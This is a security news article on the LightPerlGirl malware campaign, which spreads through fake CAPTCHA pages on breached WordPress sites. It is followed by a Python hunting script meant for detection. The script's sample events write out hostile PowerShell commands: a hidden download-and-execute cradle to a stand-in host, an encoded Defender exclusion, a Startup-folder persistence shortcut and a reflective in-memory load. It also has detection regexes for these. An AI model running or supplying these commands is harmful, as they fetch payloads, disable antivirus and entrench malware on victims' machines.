Security researchers have flagged a deceptive malware campaign that uses fake CAPTCHA pop-ups to install a new threat dubbed LightPerlGirl. Rather than delivering an exploit, the attack tricks victims into running a disguised PowerShell command themselves, which leaves security tools far less to inspect.
Researchers at Todyl identified the threat after spotting unusual PowerShell activity on a partner's compromised device. The campaign uses legitimate WordPress sites that had already been breached to serve a fake security-check page mimicking trusted services such as Cloudflare.
Instead of exploiting a software vulnerability, the attackers rely on social engineering: the page instructs the user to copy a command and run it through the Windows Run dialog. Because the victim launches the command by hand, no malicious attachment or download has to pass through mail or web filtering, and the first artefact a defender sees is PowerShell being started by explorer.exe, the process that services the Run dialog.
LightPerlGirl, named after a copyright string in its code ("Copyright (c) LightPerlGirl 2025") and also carrying Russian-language strings, runs in several stealthy stages. The initial script contacts a command-and-control (C2) server to fetch a second-stage payload built around three core functions:
- HelpIO: Attempts privilege escalation and then weakens Windows Defender by adding the Temp folder to its exclusion list, so anything dropped there is not scanned. Adding an exclusion requires administrative rights, which is presumably why the function tries to escalate first.
- Urex: Provides persistence by downloading a batch file and placing a shortcut to it in the Startup folder, so it runs again at every logon.
- ExWpL: Loads the final .NET payload straight from memory via reflection, so it never has to be written to disk where file-based scanners would find it.
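The behaviours above are all visible in endpoint process-creation telemetry. As an added example (not code from Todyl or from the original article), the following Python script runs simple hunting rules over a few constructed process-creation records that mirror the chain described: PowerShell launched from the Run dialog with a hidden window and a download cradle, a Defender exclusion for Temp, a Startup-folder shortcut, and a reflective .NET load. It also decodes `-EncodedCommand` arguments (base64 of UTF-16LE) so obfuscated launches are inspected too. The cmdlet and API names it looks for (Add-MpPreference, WScript.Shell.CreateShortcut, Assembly.Load) are the standard ways to perform each action and are assumed here; the article does not name the exact calls. The sample events and the example.invalid URL are made up for this example.

```python
"""Hunting rules for a ClickFix-style PowerShell chain over constructed
process-creation records. Record fields loosely follow Sysmon Event ID 1 /
Security 4688. Cmdlet and API names below are assumptions about how each
stage is commonly implemented, not facts taken from the write-up."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Stage 1: Win+R hands the typed command to explorer.exe, so a Run-dialog
# launch appears as powershell.exe with explorer.exe as parent, typically
# with a hidden window and a download cradle that fetches stage 2.
RUN_DIALOG_PARENTS = {"explorer.exe"}
LAUNCH_FLAGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass)",
    re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(
    r"(\biwr\b|\birm\b|invoke-webrequest|invoke-restmethod|downloadstring|\biex\b|invoke-expression)",
    re.IGNORECASE)

# Stage 2 markers, one per function named in the article (assumed mechanisms).
DEFENDER_EXCLUSION = re.compile(
    r"add-mppreference[^|;]*-exclusionpath[^|;]*(\\temp\b|\$env:temp\b|%temp%)",
    re.IGNORECASE)
STARTUP_SHORTCUT = re.compile(
    r"""(\\start menu\\programs\\startup\\[^'"]*\.lnk|createshortcut\()""",
    re.IGNORECASE)
REFLECTIVE_LOAD = re.compile(
    r"\[(system\.)?reflection\.assembly\]::load\(", re.IGNORECASE)
ENCODED_ARG = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_command(script: str) -> str:
    """What PowerShell expects after -EncodedCommand: base64 of UTF-16LE text.
    Used only to build a realistic sample event."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str) -> str:
    """Append the decoded -EncodedCommand payload, if any, so the rules also
    see obfuscated launches. Bad base64 or an odd byte count (not valid
    UTF-16) leaves the line unchanged instead of raising."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return command_line
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return command_line
    return f"{command_line} {decoded}"


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event triggers."""
    cmd = decode_encoded_command(ev.command_line)
    parent = ev.parent_image.lower().rsplit("\\", 1)[-1]
    is_powershell = ev.image.lower().endswith(("powershell.exe", "pwsh.exe"))
    hits = []
    if (is_powershell and parent in RUN_DIALOG_PARENTS
            and LAUNCH_FLAGS.search(cmd) and DOWNLOAD_CRADLE.search(cmd)):
        hits.append("clickfix_run_dialog_launch")
    if DEFENDER_EXCLUSION.search(cmd):
        hits.append("defender_temp_exclusion")
    if STARTUP_SHORTCUT.search(cmd):
        hits.append("startup_shortcut_persistence")
    if REFLECTIVE_LOAD.search(cmd):
        hits.append("reflective_assembly_load")
    return hits


def hunt(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map the index of each suspicious event to the rules it matched."""
    return {i: classify(ev) for i, ev in enumerate(events) if classify(ev)}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed telemetry: a benign console launch, then the four stages.
# example.invalid is a reserved name, not a real C2 host.
SAMPLE_EVENTS = [
    ProcEvent(EXPLORER, PS, "powershell.exe"),
    ProcEvent(EXPLORER, PS,
              'powershell -w hidden -nop -ep bypass -c "iex (iwr http://example.invalid/verify -UseBasicParsing)"'),
    ProcEvent(PS, PS,
              "powershell -w hidden -enc " + encode_command("Add-MpPreference -ExclusionPath $env:TEMP -Force")),
    ProcEvent(PS, PS,
              "powershell -nop -c \"$s=(New-Object -ComObject WScript.Shell).CreateShortcut("
              "'$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\upd.lnk');"
              "$s.TargetPath='$env:TEMP\\upd.bat';$s.Save()\""),
    ProcEvent(PS, PS,
              'powershell -nop -c "[System.Reflection.Assembly]::Load([Convert]::FromBase64String($b)).EntryPoint.Invoke($null,$null)"'),
]

if __name__ == "__main__":
    for idx, rules in hunt(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

The first rule deliberately requires all three conditions (explorer.exe parent, hidden-window or policy-bypass flag, download cradle) because a user opening a PowerShell console from the Run dialog is routine; the stage-2 rules are independent of the parent, since by then the malicious script is already running inside PowerShell.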
The campaign shows how current threats pair convincing imitation of trusted interfaces with real technical depth. Its persistence mechanism keeps the malware running across reboots, and the implant continues to take instructions from its C2 infrastructure.
The attack also underlines a broader shift away from traditional exploits and toward manipulating users through familiar interfaces, turning them into unwitting participants in the compromise of their own systems.
Security teams are urged to strengthen endpoint protections and to warn users about verification prompts that ask them to run commands. The behaviours described here are all observable on the endpoint: PowerShell spawned from the Run dialog, changes to Defender exclusions, and new shortcuts in the Startup folder are each worth alerting on.
News Source: CybersecurityNews.com